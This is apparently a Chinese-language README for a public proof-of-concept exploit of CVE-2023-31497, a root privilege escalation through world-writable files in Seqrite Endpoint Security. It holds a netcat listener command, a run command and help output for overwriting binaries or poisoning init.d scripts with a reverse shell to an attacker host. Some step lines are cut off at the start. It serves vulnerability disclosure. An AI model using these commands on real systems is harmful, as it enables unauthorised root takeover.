QuickHeal的Seqrite企业端点安全解决方案(EPS)中存在的一个权限提升漏洞。该漏洞已分配CVE ID为CVE-2023-31497。
Seqrite端点安全在默认安装时会安装到/usr/lib/Seqrite/,其目录和文件权限非常脆弱,授予本地用户对该目录内容的完全读写权限。此外,安装过程会将其启动脚本安装到/etc/init.d/,这些脚本全局可写。这使得系统上的任何低权限用户都可以将权限提升为root。
该利用程序利用了软件引入的两个不同漏洞来提升系统权限。首先,应用程序使用/etc/init.d/中的脚本来启动其扫描进程,这些脚本可以被任何用户写入。其次,应用程序使用共享对象在运行时动态加载位置无关代码(PIC)。事实上,所有可执行共享对象文件都是全局可写的。最后,用于守护进程的应用程序二进制文件也是全局可写的,这意味着任何非特权用户都可以用反向shell二进制文件覆盖扫描程序二进制文件,从而以root身份执行任意代码。
该利用程序是一个简单的Python文件,有助于利用该漏洞。
步骤:
nc -lvp <port>)或metasploit(multi/handler)启动监听器。epscalate.py和shellcode.c文件复制/下载到目标系统。python3 epscalate.py -H 192.168.0.103:9999 -I)。利用程序帮助:
$ python epscalate.py -h
EPSCALATE - PoC for privesc in Seqrite EPS
~ 0xInfection
usage: epscalate.py -H <host>:<port> <technique_flag>
options:
-h, --help show this help message and exit
-H HOSTPORT, --hostport HOSTPORT
The IP and port of the listening attacker machine in format of <ip>:<port>
-B, --daemon-binaries
Overwrite the main daemon binaries to escalate privileges.
-I, --initd-scripts Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.
该利用程序已在所有基于Debian和Ubuntu的变体操作系统上测试过。
该利用代码已根据Apache 2.0许可证发布。 该漏洞已向厂商披露,并在发布漏洞时已得到修复。
漏洞和利用程序致谢:Pinaki Mondal(0xInfection)。